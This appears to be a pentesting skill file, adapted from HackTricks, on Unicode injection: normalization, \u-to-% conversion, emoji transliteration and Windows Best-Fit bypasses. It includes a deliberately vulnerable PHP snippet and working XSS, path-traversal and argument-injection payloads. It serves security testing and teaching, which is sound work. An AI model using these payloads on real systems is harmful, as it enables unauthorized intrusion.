Hacktricks-skills unicode-injection-pentest

How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.

install

Clone the upstream repo:

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/unicode-injection/unicode-injection/SKILL.MD


Unicode Injection Pentesting

A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.

Overview

Unicode injection vulnerabilities arise when a back end or front end mishandles unusual Unicode characters. An attacker may then bypass protections and inject arbitrary characters that enable injection vulnerabilities such as XSS or SQLi.

Attack Vectors

1. Unicode Normalization Attacks

When it happens: Systems modify user input after validation (e.g., converting to uppercase/lowercase).

How it works: Some Unicode characters are normalized to ASCII during the transformation, producing characters (such as <) that the earlier filter never saw.

Example:

Input: ＜ (U+FF1C, fullwidth less-than sign)
After NFKC normalization: <
Result: < character injected after the filter has already run

Testing approach:

Identify input fields with case conversion or normalization
Send Unicode characters that normalize to dangerous ASCII
Check if the normalized output bypasses filters
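A minimal Python sketch of this check-then-transform pattern, assuming a hypothetical filter that only rejects ASCII angle brackets and a back end that applies NFKC normalization after the check. naive_filter and transform_after_check are illustrative names; the character mappings come from the Unicode data in Python's standard library.

```python
import unicodedata


def naive_filter(value: str) -> bool:
    """Hypothetical validator: reject input containing ASCII angle brackets."""
    return "<" not in value and ">" not in value


def transform_after_check(value: str) -> str:
    """Hypothetical post-validation step: NFKC normalization."""
    return unicodedata.normalize("NFKC", value)


payload = "\uff1cscript\uff1e"  # fullwidth < and > (U+FF1C, U+FF1E)
print(naive_filter(payload))            # True: no ASCII brackets yet
print(transform_after_check(payload))   # <script>

# Case conversion has similar effects on a few characters:
print("\u212a".lower())  # KELVIN SIGN lowercases to "k"
print("\u017f".upper())  # LATIN SMALL LETTER LONG S uppercases to "S"
```

The same idea applies to any transformation that runs after validation: the filter must operate on the final form of the data, not the raw input.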

2. \u to % Conversion Attacks

When it happens: The backend transforms the \u prefix of a Unicode escape into % (URL-encoding style).

How it works: The character 㱋 is written \u3c4b. The backend turns this into %3c4b, which URL-decodes to <4b, injecting a < character.

Testing approach:

Find Unicode characters whose \u representation starts with the hex code of the character you need (for example \u3cXX for <, which is 0x3C)
Send them to the application
Check if the backend converts \u to %
Verify if URL decoding creates injection characters
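The conversion can be reproduced locally to work out payloads before testing. vulnerable_backend is a hypothetical model of the flawed back end (Python's unicode_escape codec produces the \uXXXX form), and char_for is an illustrative helper: because the two hex digits after \u become a %XX byte, any code point whose high byte equals the target ASCII code works, and its low byte survives as two literal hex characters.

```python
from urllib.parse import unquote


def vulnerable_backend(raw: str) -> str:
    """Hypothetical back end: escape non-ASCII chars, rewrite the escape prefix to %, URL-decode."""
    escaped = raw.encode("unicode_escape").decode("ascii")  # chr(0x3C4B) becomes the text \u3c4b
    return unquote(escaped.replace("\\u", "%"))             # %3c4b decodes to <4b


def char_for(target: str, low_byte: int = 0x4B) -> str:
    """Pick a BMP code point whose high byte is the ASCII target (e.g. '<' gives U+3Cxx)."""
    return chr((ord(target) << 8) | low_byte)


print(vulnerable_backend(char_for("<")))  # <4b

# Choosing low bytes that spell useful hex letters: \u3cab yields "<ab", so "br" completes "<abbr".
payload = char_for("<", 0xAB) + "br autofocus tabindex=1 onfocus=alert(1)" + char_for(">", 0x00)
print(vulnerable_backend(payload))  # <abbr autofocus tabindex=1 onfocus=alert(1)>00
```

Note that the payload itself contains no ASCII < or >, so a filter that runs before the conversion sees nothing to block.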

Useful resources:

Unicode Explorer - Find character codes
Unicode Injection Research - Deep dive

3. Emoji Injection Attacks

When it happens: Backends mishandle emoji encoding conversions.

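How it works: Encoding mismatches can turn emoji bytes into dangerous characters. If UTF-8 input is decoded as Windows-1252, the last byte of 💋 (0x8B) becomes ‹ (U+2039) and the last byte of 💛 (0x9B) becomes › (U+203A); a later transliteration to ASCII then turns them into < and >.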

Example payload:

💋img src=x onerror=alert(document.domain)//💛

Vulnerable pattern:

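<?php
$str = isset($_GET["str"]) ? htmlspecialchars($_GET["str"]) : ""; // filter runs first; the emoji payload has nothing to escape
$str = iconv("Windows-1252", "UTF-8", $str);    // mismatch: UTF-8 bytes 0x8B / 0x9B become ‹ / ›
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str); // transliteration turns ‹ / › into < / >
echo "String: " . $str;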

Testing approach:

Send emoji payloads with embedded injection code
Check for encoding conversion chains
Look for normalization to ASCII characters
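The vulnerable chain can be approximated in Python to check which bytes matter. Python has no ASCII//TRANSLIT mode, so TRANSLIT below is a hypothetical, deliberately partial table holding only the two transliterations the attack relies on; everything else becomes "?", so the characters around < and > will differ from real iconv output.

```python
import html

# Hypothetical, partial stand-in for iconv's ASCII//TRANSLIT table (real tables are larger).
TRANSLIT = {"\u2039": "<", "\u203a": ">"}


def vulnerable_chain(value: str) -> str:
    """Mimic the PHP pattern: escape, mis-decode UTF-8 as Windows-1252, transliterate."""
    escaped = html.escape(value)                         # like htmlspecialchars()
    mojibake = escaped.encode("utf-8").decode("cp1252")  # like iconv("Windows-1252", "UTF-8", ...)
    # like iconv("UTF-8", "ASCII//TRANSLIT", ...); unknown characters become "?"
    return "".join(c if c.isascii() else TRANSLIT.get(c, "?") for c in mojibake)


payload = "\U0001F48Bimg src=x onerror=alert(document.domain)//\U0001F49B"  # 💋 ... 💛
print(vulnerable_chain(payload))  # ???<img src=x onerror=alert(document.domain)//???>
```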


4. Windows Best-Fit/Worst-Fit Attacks

When it happens: A Windows application handles strings with "W" (wide, Unicode) APIs but eventually passes them to an "A" (ANSI) API, which triggers Best-Fit conversion.

How it works: Windows replaces Unicode characters that cannot be represented in the target ANSI code page with visually similar characters, often plain ASCII.

Common mappings:

Characters mapped to / (0x2F) - path traversal
Characters mapped to \ (0x5C) - path traversal
Fullwidth double quotes (U+FF02) - argument injection

Example:

Input: ＂ (fullwidth double quote U+FF02)
After Best-Fit: " (ASCII double quote)
Result: Shell argument splitting, since what was one quoted argument becomes several
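A minimal simulation of the argument-splitting example. Python has no Best-Fit codec, so BEST_FIT_SAMPLE is a hypothetical one-entry table, and quote_arg is a hypothetical escaper that blocks ASCII quotes; shlex.split stands in for the Windows command-line parser, whose rules differ in general but agree on this simple input.

```python
import shlex

# Hypothetical sample entry; confirm real mappings for the target code page on worst.fit.
BEST_FIT_SAMPLE = {"\uff02": '"'}  # FULLWIDTH QUOTATION MARK -> ASCII double quote


def best_fit(value: str) -> str:
    """Simulate the W->A conversion for the characters in the sample table only."""
    return "".join(BEST_FIT_SAMPLE.get(c, c) for c in value)


def quote_arg(arg: str) -> str:
    """Hypothetical escaper: reject ASCII quotes, then wrap the argument in quotes."""
    if '"' in arg:
        raise ValueError("quote not allowed")
    return f'"{arg}"'


user_input = "a\uff02 --injected \uff02b"
command_line = quote_arg(user_input)        # passes the check, looks like one argument
print(shlex.split(command_line))            # a single element before conversion
print(shlex.split(best_fit(command_line)))  # ['a', '--injected', 'b'] after Best-Fit
```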

Testing approach:

Check if target uses Windows with W→A API conversion
Use worst.fit mapping to find character mappings
Send Unicode characters that map to dangerous ASCII
Test blacklist bypasses, path traversal, shell escape bypasses
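The blacklist and path-traversal checks can be simulated the same way. The two mappings below (fullwidth solidus and fullwidth reverse solidus) are assumed sample entries, not a verified table for any specific code page; confirm them on worst.fit for the target before testing. blacklist_ok is a hypothetical filter that runs on the Unicode string before the W→A conversion.

```python
# Hypothetical sample of Best-Fit entries; verify against worst.fit for the target code page.
BEST_FIT_SAMPLE = {"\uff0f": "/", "\uff3c": "\\"}


def best_fit(value: str) -> str:
    """Simulate the W->A conversion for the characters in the sample table only."""
    return "".join(BEST_FIT_SAMPLE.get(c, c) for c in value)


def blacklist_ok(path: str) -> bool:
    """Hypothetical blacklist applied to the wide string before the A API call."""
    return not any(bad in path for bad in ("../", "..\\"))


payload = "..\uff3c..\uff3cwindows\uff3cwin.ini"
print(blacklist_ok(payload))  # True: no ASCII separators yet
print(best_fit(payload))      # ..\..\windows\win.ini
```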

Testing Workflow

Step 1: Reconnaissance

Identify input vectors: Forms, URL parameters, headers, file uploads
Check for encoding: Look for iconv, htmlspecialchars, case conversion
Determine platform: Windows vs Linux (affects Best-Fit applicability)
Map the data flow: Where does input go? What transformations occur?
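For the "Check for encoding" step, a rough source-review helper can flag transformation calls worth tracing. The regular expressions and the RISKY_PATTERNS, scan_text and scan names are hypothetical; they match on text only and will produce false positives and negatives, so treat hits as leads rather than findings.

```python
import re
from pathlib import Path

# Hypothetical pattern list: calls that transform input after (or instead of) validation.
RISKY_PATTERNS = {
    "iconv": re.compile(r"\biconv\s*\("),
    "mb_convert_encoding": re.compile(r"\bmb_convert_encoding\s*\("),
    "case conversion": re.compile(
        r"\b(?:strtoupper|strtolower|mb_strtoupper|mb_strtolower|toUpperCase|toLowerCase)\s*\("
        r"|\.(?:upper|lower)\s*\("
    ),
    "normalization": re.compile(r"\bnormalize\s*\("),
    "htmlspecialchars": re.compile(r"\bhtmlspecialchars\s*\("),
}


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, label) for each risky call found in one file's text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, pattern in RISKY_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


def scan(root: str, suffixes=(".php", ".py", ".js", ".ts", ".java")) -> list[tuple[str, int, str]]:
    """Walk a source tree and report risky calls per file."""
    results = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            for lineno, label in scan_text(path.read_text(errors="ignore")):
                results.append((str(path), lineno, label))
    return results
```

Each hit is a place to follow the data flow: does the call run after the filter, and what encoding does it assume?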

Step 2: Initial Testing

Send basic Unicode: Test with common Unicode characters
Check normalization: Look for case conversion or encoding changes
Test emoji: Send emoji payloads with embedded code
Try \u sequences: Send Unicode escape sequences
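The initial probes can be tracked with a marker-based check: wrap each probe character in digit markers (unaffected by case conversion or NFKC), send it, and see whether the reflected value still contains the original character or its ASCII counterpart. The probe list, the markers and the helper names are assumptions for illustration; sending the requests is left to whatever HTTP client you already use.

```python
import unicodedata

# Hypothetical starter probes: (non-ASCII input, ASCII character it may turn into).
PROBES = [
    ("\uff1c", "<"),  # FULLWIDTH LESS-THAN SIGN (NFKC)
    ("\uff07", "'"),  # FULLWIDTH APOSTROPHE (NFKC)
    ("\u212a", "k"),  # KELVIN SIGN (lowercasing)
    ("\u017f", "S"),  # LATIN SMALL LETTER LONG S (uppercasing)
    ("\u3c4b", "<"),  # \u-to-% conversion: \u3c4b -> %3c4b -> <4b
]


def make_probe(char: str) -> str:
    """Wrap the probe in digit markers so it is easy to locate in the response."""
    return f"1337{char}7331"


def classify(char: str, expected: str, reflected: str) -> str:
    """Report whether the probe came back unchanged, transformed to ASCII, or neither."""
    if make_probe(char) in reflected:
        return "unchanged"
    if f"1337{expected}" in reflected:
        return "transformed"
    return "other"


# Local check with a simulated NFKC back end:
print(classify("\uff1c", "<", unicodedata.normalize("NFKC", make_probe("\uff1c"))))
```

A "transformed" result identifies which transformation the target applies, which narrows the attack vectors above.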

Step 3: Advanced Testing

Use worst.fit mappings: Find characters that map to dangerous ASCII
Test encoding chains: Multiple conversions can create vulnerabilities
Bypass blacklists: Use Unicode equivalents of blocked characters
Path traversal: Map characters to / and \
Shell injection: Use fullwidth quotes for argument splitting
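To act on "Bypass blacklists", the sketch below enumerates Basic Multilingual Plane characters whose NFKC form equals a blocked ASCII character. It assumes the application applies NFKC; Best-Fit and case mappings are different tables and are not covered here (use worst.fit for Best-Fit). nfkc_equivalents is a hypothetical helper name.

```python
import unicodedata


def nfkc_equivalents(target: str) -> list[str]:
    """Return non-ASCII BMP characters whose NFKC form is exactly `target`."""
    found = []
    for cp in range(0x80, 0x10000):
        if 0xD800 <= cp <= 0xDFFF:  # skip surrogate code points
            continue
        ch = chr(cp)
        if unicodedata.normalize("NFKC", ch) == target:
            found.append(ch)
    return found


for ch in nfkc_equivalents("<"):
    print(f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}")
```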

Step 4: Verification

Check output: Does the injection work?
Review logs: What did the backend receive?
Test impact: Can you execute code, read files, etc.?
Document findings: Save payloads and results

Common Payloads

XSS via Unicode

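\u3cabbr autofocus tabindex=1 onfocus=alert(1)\u3e00  # \u-to-% conversion: \u3cab -> <ab, \u3e00 -> >00
💋img src=x onerror=alert(1)//💛  # Windows-1252 -> ASCII//TRANSLIT chain turns the emoji into < and >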

Path Traversal via Best-Fit

..\u2215..\u2215windows\u2215win.ini  # Characters that Best-Fit maps to / (check worst.fit for the target code page)

Shell Injection via Fullwidth Quotes

a\uff02 --injected \uff02b  # Fullwidth quotes become ASCII quotes, so the quoted argument "a＂ --injected ＂b" splits into three

Tools and Resources

Unicode Explorer - Character lookup
worst.fit - Windows Best-Fit mappings
Unicode Emoji Charts - Emoji reference

Important Notes

Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
Some vulnerabilities won't be fixed: Best-Fit is intended Windows behavior, and there is disagreement over who should fix the resulting issues
Test in context: What works depends on the specific application and platform

When to Use This Skill

Testing input validation and WAF bypasses
Investigating XSS or SQLi that seems filtered
Analyzing encoding-related issues
Pentesting Windows-based web applications
Reviewing applications with Unicode handling
When standard injection payloads are blocked

Safety and Ethics

Only test systems you have authorization to test
Document all findings for remediation
Unicode injection can have unintended side effects
Some exploits may cause application crashes or data corruption